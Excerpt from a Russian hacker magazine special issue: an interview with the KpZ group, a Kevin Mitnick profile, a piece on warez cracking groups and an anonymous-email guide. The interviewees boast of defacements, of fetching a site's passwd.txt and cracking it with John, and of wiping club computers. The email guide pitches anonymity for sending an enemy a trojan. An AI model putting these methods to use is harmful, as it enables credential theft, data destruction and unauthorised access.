MAL: Я этим занимаюсь, потому что мне это нравится. Я повышаю свои умственные способности, то есть я стремлюсь к самосовершенствованию. В какой-то степени хакерство можно использовать и в качестве заработка, мести, разборки, но никакими деньгами не купишь того морального удовлетворения, которое получаешь при взломе очередного сервера.

X: Какие там на самом деле отношения с группой Pentaguard?

Mishgan: Все началось с того, что поздней ночью я решил поломать парочку серваков и тут наткнулся на сервер с дырявым FronPage’-ом и от нечего делать решил поиздеваться над ним... Заменил главную страницу своей, где оставил свое мыло, как говорится, для сожалений и мата. :) Вдруг через 15-20 минут мне приходит письмо следующего содержания (на английском): «Ты кретин! Ты не представляешь себе, что ты натворил...» и т.д. и т.п. Это оказался сайт румынской хакерской группы «Пентагуард». :) В ответ на свое письмо он получил послание на три широко известные веселые буквы... Ну, а потом разговорились мы с ним, рассказали о себе. Ну и было время, что мы с Diablo (Member of Pentuguard) нахацкали кучу военных хостов. Но, к сожалению, он в скором времени исчез из Инета, и больше я его не видел. На этом и закончились какие-либо отношения с этой группой. А шуму-то в прессе было! :)

MAL: Ну да, так и было. А у меня лично никаких отношений с этой группой нет. Mishgan контактировал с лидером этой группы, и они просто договорились в одно время заменить одинаковые индексы на военных серверах, как бы для придачи этому процессу глобального характера. Поэтому пошли слухи, что мы работаем вместе. А так мы ни с кем не сотрудничаем.

X: А были какие-нибудь прикольные случаи в хакерской жизни?

Mishgan: Вообще-то, случаев было огромное количество, только вот в голову ничего не лезет, ну не помню, хоть застрелись... Мне очень понравился случай, как одни мои знакомые завалили провайдера. Ну, значит, зарутили его, но цель была другой... Было послано письмо админу, типа давай, мы тебе говорим дырку в твоем сайте и объясняем, как ее заткнуть, а ты дашь нам парочку аккаунтов. На что последовал ответ: «А ключи от квартиры тебе не дать?». Спасибо, ответил мой знакомый. :) В этот же день можно было видеть на сайте красивую страничку с названием «Hacked» :) А всего-то надо было поделиться Инетом... Но админ сделал свой выбор... Кроме того, на сайте не осталось ничего, кроме этой странички... Как говорится, «жадность фраера сгубила». :)

MAL: Прикольный случай? Ну, знаешь, сейчас в Интернете большое количество музыкальных групп открывают свои странички. И, естественно, есть те музыканты, которые нас бесят. Ну вот в честь этого со страницы одной из попсовых групп была стерта доска объявлений (webboard). Причем никаких особых знаний для этого не потребовалось — стоило только набрать в броузере строку www.******.ru/ webboard/passwd.txt и, получив пароль в DES, расшифровать с помощью всем известного Johna. Итак, все сообщения были уничтожены. И через неделю происходит следующая ситуация. Сидит один из КпЗ дома, за компьютером, как вдруг вырубается свет и в тот же момент слышен стук в дверь.


Спецвыпуск хакер, номер #001, стр. 001-078-4, Хакерская группа KpZ — изнутри

Хакерская группа KpZ — изнутри

Спецвыпуск хакер, номер #001, стр. 001-078-4

— Кто там?

— Милиция! Откройте.

— А по какому поводу?

— По компьютерному.

Проникнув в квартиру, наша доблестная милиция схватила компьютер и потащила его в машину вместе с парнем. Почитав в отделении хистори из ICQ и не поняв, про что это он разговаривал со своими друзьями, употребляя такие загадочные слова, как linux, irix и т.д., а также для чего у него на компьютере какие-то непонятные программки, помучив человека тупыми допросами, в которых, в общем-то,

они даже и не знали, что спрашивать, им пришлось отпустить КпЗ на волю! :)

Случай второй. Компьютерный салон ОРКИ, что когда-то существовал на Октябрьской. Опозорив их на весь Интернет заменой страницы на их сервере, это почему-то показалось нам слишком легким наказанием. Поэтому в этот вечер мы были там, в их логове. 5 минут хватило, чтобы расшифровать пароль от своего компьютера, с помощью которого можно было бы управлять машиной удаленно. Как оказалось, на всех компах был один и тот же пароль. Ну тут-то все и началось. Я быстренько залазил со своей машины на другие и все подчистую стирал. Другой человек, сидящий рядом, с ускоренным темпом на другие компы кидал autoexec.bat, который в дальнейшем, при перезагрузке, также удалял все подчистую. Из 80 машин мы только успели стереть все с 50, пока админы не поняли, что что-то не так. В ярости и с глазами, как у слона, они (админы) выбежали в центр клуба и во весь голос начали орать, чтоб никто ни в коем случае не перезагружал машины, и доступ в Интернет был резко прикрыт. Немного посмеявшись, я подозвал проходившего мимо администратора и спросил, сделав ужасно удивленное лицо: «Что случилось? Что, опять хакеры? Кто это?», на что он ответил очень серьезным голосом: «Я не знаю, кто это! Но это они! ХАКЕРЫ!». :)

X: Ребята, а чем вы занимаетесь в свободное время (вне компьютеров)? Тусуетесь где-нибудь?

Mishgan: Мемберы в обычной жизни занимаются тем же, что и другие обычные люди. Не надо думать, что хакеры — это прыщавые студенты в очках, забытые Богом и думающие только о компах и о том, что с ними связано. Хакеры — это абсолютно такие же люди, как и все, которые постоянно веселятся, ходят на дискотеки, пьют пиво (и не только), гуляют с девушками... То есть развлекаются по полной программе, как и все остальные люди. А компьютер и хакерство — очень увлекательное хобби. Ведь получаешь такое удовольствие, когда натягиваешь сервак какой-нибудь музыкальной группы, которую больше всего ненавидишь, и когда напишешь на главной странице все, что о ней думаешь. :) Ну, мы в обычной жизни развлекаемся, как только можем. Чем обычно занимается молодежь — тем мы и занимаемся.


Спецвыпуск хакер, номер #001, стр. 001-078-5, Хакерская группа KpZ — изнутри

Хакерская группа KpZ — изнутри

Спецвыпуск хакер, номер #001, стр. 001-078-5

MAL: Мое любимое времяпрепровождение без компов — бар, дискотека, много пива, девушки. Ну вот, в общем-то, и все. :)

X: Что объединяет группу? Вы все друзья или просто «коллеги»?

Mishgan: Я считаю, что прежде всего нашу группу объединяют общие интересы, все мы хотим познать как можно больше, мы все трудимся в одном направлении, да и в группе работать легче и веселее, чем заниматься вольной самодеятельностью... Друзья мы или «коллеги»? Я думаю, что мы в какой-то степени друзья, но по большей части коллеги...

MAL: На самом деле поначалу мы были просто «коллегами по цеху», но потом все это переросло в дружбу, так как нам приходилось общаться чуть ли не круглые сутки, и часто разговоры о сетях переходили в обсуждения личной жизни и т.д. и т.п. Поэтому можно сказать, что группу объединяет дружба и сплоченность коллектива.

X: Что конкретно делает группа? Только ломает серверы, заменяя index.htm?

Mishgan: Наша группа специализируется на хакинге ,то есть на взломе (получении несанкционированного доступа) удаленных систем, что стоит очень больших усилий и долгой работы. Мы заменяем на сервере заглавную страницу (index.htm или default.htm), если из сервера нельзя вытянуть никакой полезной информации. Он становится не нужен, и тогда мы меняем заглавную страницу. Ну а если же сервер полон полезной информации, то мы не делаем этого никогда! Наоборот, все делаем очень осторожно, следим за каждым шагом, внимательно чистя за собой логи.

MAL: Замена индекса делается только для того, чтобы системные администраторы знали, что у них слабая защита, и предприняли какие-либо действия. А если говорить о чем-то конкретном, то я просто пытаюсь получить как можно больше информации об операционных системах, языках программирования, каких-то новых технологий. И, естественно, изучая ОС, нельзя не попробовать найденные тобой же баги на разных серверах.

X: Как вы думаете, что у вас будет в будущем? Побалуетесь, побалуетесь — а потом «жена, дети» и т.д.?

Mishgan: Я думаю, что у КпЗ должно быть будущее (по идее). Хотя вполне возможно, что КпЗ полностью распадется со временем, так как когда человеку исполняется 30 или около 30 лет, его начинают заботить другие проблемы — семья, дети и т.д. Очень часто это случается и раньше. Надо надеяться на лучшее, надо всегда оставаться дружным коллективом, и только тогда у группы может возникнуть большое, продолжительное будущее... Вскоре мы собираемся выйти из подполья и организовать что-то вроде «Lopht» или «Genocide2600».

MAL: Ну а пока все еще нужно учиться, учиться и учиться. А потом даже не знаю. Вообще, я собираюсь открыть КпЗ-lab, аналог LOphT или Genocide2600. Естественно, придется выйти из underground и заниматься всем уже легально, не опасаясь за свою свободу.

Контакт:

MAL [KpZ] Mishgan [KpZ]

firemal@softhome.net mishgan@hotmail.com

ICQ: 100001 ICQ: 1005765

KpZ-шники были активными членами атак на военные американские сервера. И не только они. Вообще, после всех этих событий в Югославии чуть ли не каждый второй пытался внести свою лепту в борьбу против агрессора. Но когда сегодня нам в редакцию принесли этот компакт — мы были в шоке. Каково, а? «Экстренный выпуск! Хакеры бомбят НАТО!», да к тому же, на компакте содер-


Спецвыпуск хакер, номер #001, стр. 001-078-6, Хакерская группа KpZ — изнутри

Хакерская группа KpZ — изнутри

Спецвыпуск хакер, номер #001, стр. 001-078-6

жится куча информации о том, что и как нужно делать, включая объяснения дыр в системах безопасности кучу другой документации. Но больше всего мне понравилась надпись: «Диск можно считать спецкурсом по подготовке отдельного подразделения специальной бригады по информационным провокациям. Как всегда, сборник содержит подробные инструкции по ведению подрывной деятельности и богатый инструментарий». Ну просто справочник террориста! На мой взгляд, это еще одно подтверждение, что быстрее пиратов не работает никто. Или, может, кто-нибудь видел CD-ки с заголовками типа «Все на защиту НАТО! Здесь новые апгрейды от


Спецвыпуск хакер, номер #001, стр. 001-082-1, Кевин Митник: недетские игры

Кевин Митник: недетские игры

Даниил Шеповалов (dan@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-082-1

...но дело его живет

1999 год. 15 февраля. Прошло ровно четыре года с момента ареста Кевина Митника, самого известного хакера в мире, которого не обошла вниманием даже книга рекордов Гиннеса. В этот же день посетители сервера id Software не смогли в сотый раз посмотреть скриншоты третьего Quake’а и скачать новые карты уровней — вместо этого на главной странице популярного сайта их встретила надпись «Четыре года в тюрьме. Освободите Кевина сейчас же!». Члены известной хакерской команды «2600» в очередной раз показали, что могут не только наклеивать стикеры «Free Kevin» на бамперы автомобилей и рисовать свой логотип на стенах здания суда.

Ура хакерам Америки!

Пропустим малоинтересные подробности детства Кевина. Отметим лишь, что его не насиловали в пятилетнем возрасте и не заставляли петь по вечерам «Вихри враждебные веют над нами...». Несмотря на это, Митник все-таки стал самым известным, после матери Билла Гейтса конечно, человеком в компьютерном мире. О парне ходили легенды еще в то время, когда ему было 16 лет. Однажды он изменил параметры модемного соединения и со школьного терминала проник в компьютерную систему управления школами округа. Кевин не стал менять свои оценки — ему доставляло удовольствие уже то, что он смог решить такую трудную задачу. Вообще это была отличительная черта Митника — его интересовал лишь хак ради хака, он не использовал свои глубокие познания в области компьютерных технологий ради наживы. Наибольший интерес Кевин проявлял к фрикингу: он вытворял с телефонными компаниями такие вещи, что у его приятеля Ленни Ди-Чикко волосы становились дыбом. Молодой хакер всегда бесплатно звонил в другие города, пользуясь добытыми номерами кредитных карточек или перенаправляя счета за переговоры. Однажды он отомстил одному из своих недругов, переведя на номер его домашнего телефона расходы на телефонные переговоры крупной больницы. Кевин знал об устройстве телефонной сети не меньше чем многие специалисты Bell labs. Впоследствии эти знания очень пригодились ему: недаром сотрудники Digital Equipment не могли так долго поймать Кевина. Он подключался напрямую к компьютерам слежения и при первых же признаках опасности разъединял связь.

Первое серьезное столкновение с законом произошло у Митника в 84 году. В то время он и ДиЧикко проводили все свое свободное время в университете Южной Калифорнии, пытаясь попасть в пентагоновскую сеть APRAnet. Кевин получил доступ к счетам системных администраторов университетской сети, а затем, воспользовавшись этими привилегиями, начал собирать идентификаторы счетов и пароли организаций, работающих на министерство обороны США. Пользоваться засекреченными материалами военных Кевин смог только два месяца — после этого его отследил сисадмин университетской сети. Надо сказать, на этот раз Митник попросту зарвался — он знал, что кто-то обнаружил его деятельность, но тем не менее не прекратил использовать высокоскоростной канал связи, благодаря которому его довольно быстро и поймал Марк Браун, ассистент университетского вычислительного центра. В это время у Митника еще не окончился испытательный срок, который он проходил после суда по обвинению во взломе компьютерных систем Pacific Bell. На этот раз суд приговорил его к шести месяцам тюремного заключения. Марк Браун же остался в полном недоумении с распечатками паролей к компьютерам суперсекретных военных организаций.


Спецвыпуск хакер, номер #001, стр. 001-082-2, Кевин Митник: недетские игры

Кевин Митник: недетские игры

Даниил Шеповалов (dan@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-082-2

Уже давно сложился образ стандартного американского программиста: это полный парень лет 25, в потертых джинсах, клетчатой рубашке и очках. Надо сказать, Кевин полностью подходил под этот стереотип. И никто никогда не замечал, чтобы он проявлял какой-либо интерес к женщинам. Однако летом 1987 года Кевин, неожиданно для всех, женился. Я думаю, вряд ли стоит говорить о случайности того, что его избранницей оказалась администратор известной телефонной компании GTE. Митник всегда использовал людей: даже со своим другом Ленни ДиЧикко он поддерживал близкую связь в основном только потому, что тот помогал ему получать доступ к компьютерам на своей работе. Видимо поэтому Ленни и сдал его властям после кражи новейшей операционной системы из лаборатории Digital Equipment. Но обо всем по порядку.

В 1987 году Ленни устроился работать в фирме VPA. Там он имел постоянный доступ к компьютерам, а поэтому теперь они с Кевином почти каждую ночь проводили в офисе этой конторы. У Митника появилась новая идея — он хотел украсть последнюю версию операционной системы VMS фирмы Digital Equipment. Имея в своем распоряжении исходный текст этой программы, Кевин становился подобен богу. Он мог тщательно изучить все уязвимые места новой ОС и ближайшие несколько лет быть грозой компьютерных систем, основанных на ней. Также он мог продать исходный текст программы какой-нибудь конкурирующей организации или даже стране — Советский Союз тогда тщательно следил за разработками в области информационных технологий. Хранить файлы ОС на своем компьютере было чрезвычайно опасно, да и для этого потребовалась бы не одна сотня мегабайт, поэтому Кевин решил использовать в качестве перевалочного пункта уже знакомую ему компьютерную сеть университета Южной Калифорнии. Кевин нашел ошибку в системе защиты университета и изменил подпрограмму доступа в сеть. Теперь все логины и пароли записывались в определенный файл, который хакер периодически просматривал. Однако, его старый знакомый — Марк Браун снова выследил злоумышленника, Кевин выдал себе неосторожными действиями при внесении в ОС нового кода: он вывел из строя несколько компьютеров. Тем не менее, Марк теперь не мог им ничего сделать. Блуждая по просторам APRAnet, уже переросшего в Internet, Митник неожиданно для себя получил информацию, позволяющую ему проникать в Easynet — внутреннюю сеть Digital Equipment. Теперь возможностям хакера не было предела: в его распоряжении была личная переписка сотрудников компании, новейшие программные разработки, информация о дырках в программах и многое другое. Кевин закончил скачивать VMS: у него теперь была своя версия новейшей операционной системы. Он мог изменить ее код, добавить несколько троянов и заменить существующую копию в отделе распространения Digital. Однако, как я уже говорил, Кевину нравилось решать сложные задачи, он не вынашивал каких-либо жутких планов мести всему человечеству и вообще мало походил на того жуткого сумасшедшего ученого, каким его впоследствии представили средства массовой информации.


Спецвыпуск хакер, номер #001, стр. 001-082-3, Кевин Митник: недетские игры

Кевин Митник: недетские игры

Даниил Шеповалов (dan@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-082-3

С каждым днем ДиЧикко становилось все труднее и труднее общаться с Кевином. Между ними постоянно вспыхивали ссоры, да и Ленни просто стал понимать, что они затеяли очень опасную игру. У него уже не было никакой личной жизни: все ночи он проводил вместе с Кевином, который уже не мог жить без очередных взломов. Да и самого ДиЧикко все больше и больше затягивала власть над компьютерными системами и сетями. Эта власть приносила ему удовлетворение, которое он вряд ли мог бы получить другим путем. Однако, однажды Ленни все-таки сломался. И в 1988 году сдал своего друга ФБР’овцам. На вопрос Кевина «Лен, зачем ты это сделал?» тот ответил «Потому что ты — угроза для общества».

На этот раз Митнику дали год тюремного заключения. Для того, чтобы в 1990 году его все-таки выпустили на свободу, хакеру пришлось пообещать никогда больше не использовать компьютер и модем. До 1992 года Кевин жил обычной жизнью, не занимаясь взломом военных систем, похищением операционок и прочими интересными вещами. Скорее всего на него сильно повлиял шестимесячный «курс лечения от компьютерной зависимости», который ему назначил суд. Правда в этот период кто-то отключил телефон инспектора, надзирающего за хакером, из компьютера суда пропали все данные о Кевине, а на счете судьи осталось три доллара.

В 92 году Митника снова обвинили во всех смертных грехах. Ему приписывалась кража секретной информации из Управления транспортных средств, взлом военных компьютерных систем и несанкционированный доступ к материалам ФБР. По всей видимости, Кевину уже несколько надоело сидеть в одиночке, поэтому он опять сбежал. ФБР потеряло его след на два года.

В 1994 году Митник серьезно заинтересовался сотовой телефонией. Власти подозревали его в краже программного обеспечения для контроля сотовой связи из лаборатории компании Motorola. Также Фирма McCaw Cellular Communication заявила, что кто-то похитил серийные электронные номера ее сотовых телефонов. Расследуя это заявление, ФБР даже удалось выследить Кевина, однако тот успел скрыться в самый последний момент.

Свой последний взлом хакер произвел 25 декабря 1994 года. Кевин ворвался в домашний компьютер Цутому Шимомуры, известного американского специалиста в области безопасности компьютерных систем. В это время Шимомура работал над шпионской компьютерной программой для военных. Новая программа позволяла контролировать все выходящие и входящие сообщения конкретного пользователя Интенет. Естественно, это был лакомый кусочек для Кевина. Итак, в ночь под Рождество хакер начал копировать файлы из компьютера нашего самурая. Это бы свободно могло сойти ему с рук, но Шимомура установил программу, которая посылала log-файлы на удаленную машину в Центре Суперкомпьютеров, где он работал. Один из работников центра вовремя заметил существенные изменения в логах и сообщил об этом своему боссу. Второпях приехавший домой Шимомура помимо украденных файлов нашел на своем компьютере звуковое послание, в котором Кевин в довольно непринужденной форме объяснял самураю, в каком месте он его видал и как туда пройти. Такого оскорбления Цутому вынести не мог. Он решил во что бы то не стало достать Митника. Шимомуре помог случай: один из администраторов TheWell заметил необычайную активность на одном из счетов. Он поинтересовался о причинах у владельца эккаунта, а тот, в свою очередь, чуть не умер от разрыва сердца, увидев на своем счету файлы Шимомуры. Самурай установил круглосуточное наблюдение на TheWell. Проанализировав пути сообщений, он вместе с сотрудниками ФБР пришел к выводу, что хакер находится в городе Ралейх, Северная Каролина. Несмотря на все предосторожности Кевина, ФБР’овцы все-таки выследили его и, когда Шимомура засек, что Митник в очередной раз вышел на связь, власти взяли его с поличным. Произошло это 15 февраля 1995 года.


Спецвыпуск хакер, номер #001, стр. 001-082-4, Кевин Митник: недетские игры

Кевин Митник: недетские игры

Даниил Шеповалов (dan@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-082-4

Встать — суд идет

Кевину было предъявлено 23 обвинения в мошенничестве с использованием компьютерных систем. Прокурор заявил, что Митник виновен в нанесении ущерба на сумму, превышающую 80 миллионов долларов. Короче после обвинительной речи прокурора Митник уже не надеялся увидеть голубое небо в этом тысячелетии. Тем не менее, усилиями адвокатов большинство обвинений было снято. По сути Кевин должен был отсидеть всего лишь 10-12 месяцев. Однако его наказание затянулось на четыре долгих года. Постоянно находились все новые и новые факты, которые позволяли лишать хакера свободы. Специалисты считают, что такому долгому сроку заключения Кевин обязан тому, что встал на пути министерства обороны. Ведь до наезда на Шимомуру ФБР могло не раз поймать Митника. Однажды одному деятельному товарищу удалось все-таки выследить хакера. Как законопослушный гражданин, он, не долго думая, настучал на Кевина в ФБР. Однако федералы не обратили на это заявление никакого внимания. Тоесть до инцидента с Шимомурой Кевин был нафиг не нужен властям.

Прошло уже четыре года с момента ареста хакера и, совершенно неожиданно для Кевина, перед ним вдруг забрезжил луч надежды. 26 марта 1999 года судья Мариана Пфельцер согласилась на договоренность с защитой Кевина, по которой полный срок заключения последнего будет равен 54 месяцам. Официальное слушанье дела будет проведено 14 июня. В договоренности упоминается о том, что после освобождения Кевина над ним будет вестись неусыпный контроль, и вдобавок хакер не будет иметь права прикасаться к компьютерам в течении последующих трех лет. Если вдуматься, то решение суда не представляется таким уж мягким. Человека, единственным смыслом жизни которого являются компьютеры, лишают возможности пользоваться ими в течении семи лет. К тому же, будущее Кевина не так уж и безоблачно. По истечении срока заключения, ему предстоит еще бороться за свою свободу с обвинителями штата Калифорния, где всплыло дело шестилетней давности.


Спецвыпуск хакер, номер #001, стр. 001-082-5, Кевин Митник: недетские игры

Кевин Митник: недетские игры

Даниил Шеповалов (dan@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-082-5

Что делать?

Наверняка у многих из вас возникнет вопрос: как можно помочь Кевину? И надо сказать, существует реальный способ это сделать. Можно, конечно завтра же взломать www.whitehouse.gov и повесить там фотографию Митника с надписью «Ты памятник себе воздвиг нерукотворный...». Или можно на остатки зарплаты купить тухлых яиц и бежать закидывать ими судью Мариану Пфельцер. Но единственным более-менее цивилизованным способом помощи (и в то же время связанным хаком) является участие в деле команды «Mitnick rc5 Crack Team». Дело в том, что компания RSA предлагает существенный денежный приз тому, кто первым взломает ее rc5-64 код. Весь процесс взламывания заключается в следующем: присоединяешься к какой-либо команде, скачиваешь клиента и начинаешь перебирать возможные варианты. Та команда, которая первой раскодирует зашифрованную строку и получает денежный приз в размере 10000$. Правда, из этих 10 килобаксов два идут организатору (distributed.net), 6 — любой организации по выбору, 1 — команде и 1— взломавшему человеку. Команда «Mitnick rc5 Crack Team» отдает весь свой выигрыш в пользу организации защиты Кевина Митника. Так что — дерзайте! Зарегистрироваться можно здесь:

http://www.paranoid.org/mitnick/join


Спецвыпуск хакер, номер #001, стр. 001-085-1, Вся технология WAREZ’а

Вся технология WAREZ’а

sturm3r (sturmer@mail.ru)

Спецвыпуск хакер, номер #001, стр. 001-085-1

Только я сел писать все это дело, как заходит ко мне в гости один знакомый и притаскивает CD с игрушками. И что же ты думаешь, смотрю я на этот диск и вижу, что четыре из шести игрушек были релизнуты нашей группой. Вот такая вот петрушка. Непонятен смысл слова «релиз»? Сейчас попробую все рассказать по порядку.

WAREZ? Это типа что?

Не будем скрывать то, что в нашей стране практически все пользуются тем, что бесплатно предоставляют им пираты, а не тем, что пытаются впарить им за весьма немалые бабульки различные дядюшки Билли. Если кто-то думает, что на западе все не так и там живут честные парни с голубыми и ясными глазами — он очень глубоко ошибается, там живут такие же любители вареза, как ты или я. А если судить по масштабам пиратской деятельности, то мы, по сравнению с ними, вообще маленькие и сопливые детишки. Что-то я опять отвлекся, сам понимаешь, некоторое количество пенного напитка возможно и влияет положительно на процесс мышления, но его переизбыток точно все запутывает.

Вернемся же к нашим ба... то есть пиратскому софту и самим пиратам.

Многие, купив очередной диск с новым софтом, наверно наблюдали вместе с программками еще и забавные файлики с расширением .NFO, в которых рассказывается о том, что это за программка, а также что самое главное, о том, как ее надо установить, чтобы эта программка вообще заработала на твоем компе и продолжала бы работать больше чем 30... 60... 90... дней. Эти файлы как раз и говорят о том, что этот весь софт взялся не откуда-то из закромов нашей или их Родины, а был найден, взломан и распространен пиратами. Деятельность пиратских групп чем-то напоминает конвейер старика Генри Форда. Все обязанности строго распределены, и каждый занимается только своим собственным делом. Начнем с самой верхушки. Формально в группе может и не быть лидера, но на самом деле он есть всегда. Основной его работой является координация всей деятельности группы. Одним словом, надо сидеть, ничего не делать и давать всем весьма сомнительные по своей нужности указания. Затем группа разделяется на несколько подразделений. Рассмотрим их в том порядке, в каком они взаимодействуют друг с другом.

Откуда берут софт

Первое подразделение — suppliers (поставщики). Единственным занятием данных субъектов является доставание самого свежего софта или игрушек.

Кому-то может показаться, что это слишком просто, но ничего подобного. Лишь малая часть софта и тем более игрушек качается с официальных серверов разработчиков. В основном supplier’ы работают в магазинах, торгующих лицензионкой. Реже они работают в конторах, непосредственно занимающихся написанием софта или игрушек, хотя бывает и такое. И, я думаю, никого не удивит то, что настоящих имен этих людей никто не знает даже внутри группы, не говоря уже о всех остальных. Обычно всем известны только их ники, а зачастую ники известны только внутри группы. Законы на западе суровы на эту тему, так что их можно понять. Во главе всех supplier’ов стоит координатор. В его обязанности входит следить за тем, чтобы не поставлялся софт или игрушки, которые уже были выпущены другими группами, и чтобы не было никаких заморочек.


Спецвыпуск хакер, номер #001, стр. 001-085-2, Вся технология WAREZ’а

Вся технология WAREZ’а

sturm3r (sturmer@mail.ru)

Спецвыпуск хакер, номер #001, стр. 001-085-2

Как снимают защиту

И вот, когда злостный шпион в стане врага спер очередную самую свежую софтину или игрушку, клиент попадает в следующее подразделение, в руки злых гениев, которых производители софта и игрушек боятся даже больше, чем зубных врачей. Это умелые руки cracker’ов (к коим, кстати, принадлежит и ваш скромный слуга). Их задачей является как можно быстрее и качественней избавить программку от различных ненужных вещей, которые программисты зачем-то вставляют в свои программки, а также отучить игрушки от требования именно того CD, на который она была изначально записана на заводе. Hо иногда программка или игрушка занимает сотни мегабайт, что не есть хорошо, т.к. качать такие объемы по Интернету, конечно, можно, но уж слишком тяжко. Вот и приходится cracker’ам заниматься процессом обрезания ненужных частей (в игрушках это могут быть видеозаставки, музыка, а у программ не всегда нужные сотни примеров или любые другие емкие, но не очень нужные детали). Hапример, вышла недавно вторая часть про Братьев Пилотов и занимала на CD аж целых пять сотен мегабайт. Однако пара дней работы, и игра уменьшается в десять раз, при этом оставшись абсолютно полной. Естественно, у cracker’ов в группе есть также свой координатор, который следит за тем, чтобы одну и ту же программку или игрушку не брали одновременно два человека.

А если защиту

сняли криво?

Если ты думаешь, что, выйдя из умелых рук cracker’ов, программа или игрушка уже готова к выпуску — ты сильно ошибаешься, работа с ней переходит на третью стадию — тестирование. Тестированием в основном занимаются люди, работающие в компаниях, использующих ту или иную разновидность софта. Дело в том, что почти все группы имеют свою определенную сферу в области софта.

Одни группы работают с игрушками (например CLASS), другие работают с графическим софтом (SiEGE), третьи с CAD/CAM (Legends Never Die) и так далее. И, соответственно, группы имеют в своем распоряжении людей, работающих в реальной жизни с теми программами, которые являются основной деятельностью групп. Хотя, естественно, группы не брезгуют и релизами (релиз (release) — конечный продукт деятельности пиратских групп, готовая программа или игрушка), не входящими в их основную деятельность. В случае, если тестирование программы или игрушки прошло нормально и никакой скрытой или незамеченной деятельности защиты не обнаружено — программа готова к выходу. Если же были найдены небольшие недочеты — программа возвращается на одну стадию назад, в руки cracker’ов (и так по кругу, до тех пор пока все не будет полностью готово).

Ну и в конце концов...

Итак, все готово, клиент лежит на столе и ждет, когда все швы будут зашиты. Программку или игрушку запаковывают, добавляют к архиву необходимые инструкции о том, что это за программа, какой группой она была релизнута и как ее правильно инсталлировать, чтобы не испытывать угрызений совести во время нажимания кнопочек Ok на окошках с напоминанием о том, что осталось всего 3 дня, чтобы заплатить кучу денег. После этого в дело вступают курьеры (couriers), которые занимаются распространением уже совсем готовых программ по различным ftp серверам, откуда программки и игрушки в итоге расползаются по всему миру.


Спецвыпуск хакер, номер #001, стр. 001-085-3, Вся технология WAREZ’а

Вся технология WAREZ’а

sturm3r (sturmer@mail.ru)

Спецвыпуск хакер, номер #001, стр. 001-085-3

Данный текст не является пропагандой изготовления, использования и распространения нелицензионного программного обеспечения. Все выше написанное является продуктом больного воображения автора и подхвачено больным воображением редактора, хоть и не имеет под собой никакого реального подтверждения. Любые совпадения с реальными людьми, животными, инопланетными субстанциями и событиями следует считать абсолютно случайными совпадениями, достойными занесения в книгу рекордов Гинесса.


Спецвыпуск хакер, номер #001, стр. 001-086-1, Халявная Электронная Почта

Халявная Электронная Почта

Kurt

Спецвыпуск хакер, номер #001, стр. 001-086-1

Что такое электронная почта, я надеюсь, ты знаешь. В наше время иметь постоянную почту предоставленную твоим провайдером довольно рискованное дело... Кто знает, что с ним может случится? И вот поэтому-то, на крайний случай, ты всегда сможешь завести себе бесплатный почтовый ящик на любом из пришедших тебе по вкусу адресов. Преимущества WEB почты перед обычной POP3 в том, что ты не привязан к своему компу и можешь проверять почту из любого места! Вся она хранится на удаленном сервере. А значит, что даже если злобный хацкер отформатирует тебе винт, то твоя почта все равно останется невредимой. Вот тебе списочек Бесплатных E-mail служб. И поспеши! Может как раз в этот самый момент кто-то пытается забить себе хороший логинчик :-)

Хочешь остаться неизвестным, когда получатель твоего письма — Бил Гей-тссс?

Тебе, наверное, часто хотелось выявить реального автора полученного сообщения. К примеру, ты получаешь письмо от так называемой «Службы поддержки» своего провайдера, в котором он пишет, что из-за сбоя в системе базы данных учета пользователей вся информация о тебе была утеряна, и просит тебя немедленно сообщить Логин и Пароль для повторного занесения в базу данных. Ты можешь (если ты полный дуб) вздохнуть с облегчением и отослать этим друзьям свой Login и Pass, и радоваться жизни дальше. Но лучше попытайся выяснить, какая такая сволочь пытается спереть твой доступ в Интернет. Делается это на самом деле легко. Просто зайди на сервер своего проваши и найди там техподдержку, там обязательно указано мыло, на которое нужно слать письма. Вот туда-то ты и отфорвади это письмишко со всякими сомнительными просьбами.

Но я ведь знаю, знаю тебя! Ты ведь еще тот пакостник! Сам ведь хочешь послать сюрприз своему врагу в виде трояна! И при этом тебе не хочется, чтобы этот гад смог тебя вычислить? Ну, тогда в путь! Для начала разберем, из чего состоит письмо, отправленное обычным Почтовым клиентом, к примеру, MS OutLook Express:

Все, что выделено красным цветом, это наши следы: наш IP и адрес для ответа. Хотим мы того или нет, но все современные SMTP сервера насильно вписывают наш настоящий IP адрес, а это нас с тобой, конечно, не устраивает.

Но хоть и кажется, что SMTP сервера такие крутые, так хорошо поступают, адреса вписывают, борются с хацкерами, а на самом деле эти сервера очень несовершенны. У них есть куча недостатков, о которых знают почти все, и никто не может (или не хочет) с этим бороться. Вот, предположим, что ты захотел отослать кому-нибудь письмо, в котором всем известным тебе десятиэтажным матом ты обложишь получателя, и при этом тебе еще хочется сделать так, чтобы он не узнал, от кого это письмо пришло. Существует несколько способов это сделать.

Способ 1:

Использование Майл Форвардинга

(Mail Forward).

Эти службы занимаются простой переадресовкой сообщений. К примеру, www.iname.com (name@iname.com) и forward.rz.ru (name@eto.kru.to). Предположим, ты пользуешься адресом электронной почты своего провайдера gad@cityline.ru. Используя Майл Форвард, ты сможешь сделать себе постоянный Mail-адрес независимо от того, с какой периодичностью ты меняешь своих провайдеров. К примеру, ты создаешь себе аккаунт на Iname Gad@iname.com и настраиваешь его так, чтобы он пересылал всю почту на твой текущий полноценный почтовой ящик gad@cityline.ru. В будущем, при смене провайдера, твой Mail-адрес останется тем же! Тебе придется только перенастроить переадресовку сообщений на сервере Iname.com так, чтобы почта пересылалась на твой новый почтовой ящик. Хорошая это вещь, но для полной анонимности этот способ не подходит, так как при отправке через SMTP сервер Iname,твой IP будет включен в заголовок письма (Смени Мозги 1).


Спецвыпуск хакер, номер #001, стр. 001-086-2, Халявная Электронная Почта

Халявная Электронная Почта

Kurt

Спецвыпуск хакер, номер #001, стр. 001-086-2

Способ 2:

Использование

Ремейлеров (Remailer).

Эти WEB-базированные службы служат для отправки анонимных сообщений прямо с WEB’а (см. рис. внизу). Принцип работы Ремейлов очень прост. При отправке твоего сообщения из заголовка уничтожается вся информация об отправителе. А значит, получатель не сможет никаким образом определить отправителя письма. Вот этот способ является полностью анонимным, в отличии от первого.

http://www.replay.com/remailer — тут можно найти большое количество Ремейлов и информацию о них.

Способ 3:

Отправка сообщений

через WEB службы.

